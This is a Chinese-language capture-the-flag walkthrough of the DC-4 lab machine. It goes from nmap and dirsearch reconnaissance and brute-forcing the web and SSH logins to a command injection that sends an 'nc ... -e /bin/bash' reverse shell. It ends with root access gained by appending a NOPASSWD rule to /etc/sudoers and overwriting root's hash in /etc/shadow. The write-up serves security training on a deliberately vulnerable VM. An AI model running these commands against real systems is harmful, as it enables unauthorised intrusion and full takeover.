DC-4
主机发现端口扫描
探测存活主机,
173是靶机1
2
3
4
5
6
7
8
9
10
11
12
13
14
15nmap -sP 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 15:33 CST
Nmap scan report for 192.168.75.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.173
Host is up (0.00054s latency).
MAC Address: 00:0C:29:01:61:57 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00022s latency).
MAC Address: 00:50:56:E0:C9:6A (VMware)
Nmap scan report for 192.168.75.151扫描靶机所有开放端口
1
2
3
4
5
6
7
8
9nmap -sT -min-rate 10000 -p- 192.168.75.173
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 15:34 CST
Nmap scan report for 192.168.75.173
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:01:61:57 (VMware)扫描服务版本及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sV -sT -O -p80,22 192.168.75.173
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 15:36 CST
Nmap scan report for 192.168.75.173
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http nginx 1.15.10
MAC Address: 00:0C:29:01:61:57 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22nmap -script=vuln -p 80,22 192.168.75.173
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 15:37 CST
Nmap scan report for 192.168.75.173
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.173
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.75.173:80/
| Form id:
| Form action: login.php
|
| Path: http://192.168.75.173:80/login.php
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:01:61:57 (VMware)
web渗透
访问页面,显示**
Admin Information Systems Login**
扫描目录,也没发现
1
2
3
4
5
6
7
8
9dirsearch -u 192.168.75.173 -x 403
//
[15:40:32] Starting:
[15:40:53] 302 - 704B - /command.php -> index.php
[15:40:55] 301 - 170B - /css -> http://192.168.75.173/css/
[15:41:02] 301 - 170B - /images -> http://192.168.75.173/images/
[15:41:06] 302 - 206B - /login.php -> index.php
[15:41:07] 302 - 163B - /logout.php -> index.php尝试了
sql注入也没效果,尝试暴力破解用户名是
admin,爆破密码
happy的时候长度明显不一样,密码应该就是happy了成功登陆进去,点击
run会执行查看当前目录文件,执行的命令是ls -l
当我们不知道命令是怎么控制的,抓包看看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17POST /command.php HTTP/1.1
Host: 192.168.75.173
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.75.173
Sec-GPC: 1
Connection: keep-alive
Referer: http://192.168.75.173/command.php
Cookie: PHPSESSID=18ugmlkd6apve37kqclfdj4100
Upgrade-Insecure-Requests: 1
Priority: u=0, i
radio=ls+-l&submit=Run原来是在数据包参数
radio规定执行的命令,我们直接输入反弹shell命令,kali同时开启监听1
radio=nc 192.168.75.151 1234 -e /bin/bash&submit=Run
获得shell
1
2
3listening on [any] 1234 ...
192.168.75.173: inverse host lookup failed: Unknown host
connect to [192.168.75.151] from (UNKNOWN) [192.168.75.173] 45602
提权
查看权限
1
2
3
4
5
6
7
8www-data@dc-4:/usr/share/nginx/html$ whoami
www-data
//
www-data@dc-4:/usr/share/nginx/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
//
www-data@dc-4:/usr/share/nginx/html$ uname -a
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686 GNU/Linux查找敏感文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17www-data@dc-4:/usr/share/nginx/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh发现一个存在可执行文件
test.sh查看
test.sh内容,应该提示该目录下有东西什么的1
2
3
4
5
6
7
8
9
10
11www-data@dc-4:/home/jim$ cat test.sh
//
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."进行查看
jim目录下的文件,目录下的mbox文件没访问权限,在backups目录下找到old-passwords.bak1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
...........
svetlana
fatima
123456k
icecream
popcorn1是很多的的密码,我们拿去爆破
ssh用户jim,将内容保存为passwd使用hydra爆破
1
hydra -l jim -P passwd -vV -e ns 192.168.75.173 ssh
1
2
3[22][ssh] host: 192.168.75.173 login: jim password: jibril04
[STATUS] attack finished for 192.168.75.173 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found破解出用户
jim密码jibril04,其实也可以用来尝试破解root用户,不过没破解出来登录
jim用户,查看权限没有相关
sudo权限查看当前目录下的
mbox文件1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.是一封来自
root的文件,跟着邮件这个线索,我们去翻邮件/var/mail存在一封jim的邮件1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles告诉我们
Charles的密码是^xHhA&hvim0y
登录
charles用户,查看权限1
2
3
4
5
6charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee存在有sudo权限的
teehee命令1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24charles@dc-4:/usr/bin$ sudo teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'teehee提权,直接给用户sudo all nopasswd权限1
echo "charles ALL=(ALL) NOPASSWD: ALL" | sudo teehee -a /etc/sudoers
然后修改
shadow文件1
sudo nano /etc/shadow
将当前用户
charles的密码覆盖root账户的密码1
2
3
4
root:$6$C7nromw2$HB4uMhUmb.srv.I.Q00bT/SV3fxgphbarSb4A8B0aI6kPGOy6WKrKJk.ckCfMLuO6H4uqGx68ylJcmB5ezJ.r0:17992:0:99999:7:::
.......
charles:$6$C7nromw2$HB4uMhUmb.srv.I.Q00bT/SV3fxgphbarSb4A8B0aI6kPGOy6WKrKJk.ckCfMLuO6H4uqGx68ylJcmB5ezJ.r0:17992:0:99999:7:::su切换到root,使用charles的密码^xHhA&hvim0y1
2
3charles@dc-4:~$ su root
Password:
root@dc-4:/home/charles#提权成功!读取
flag文件1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18# root@dc-4:~# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.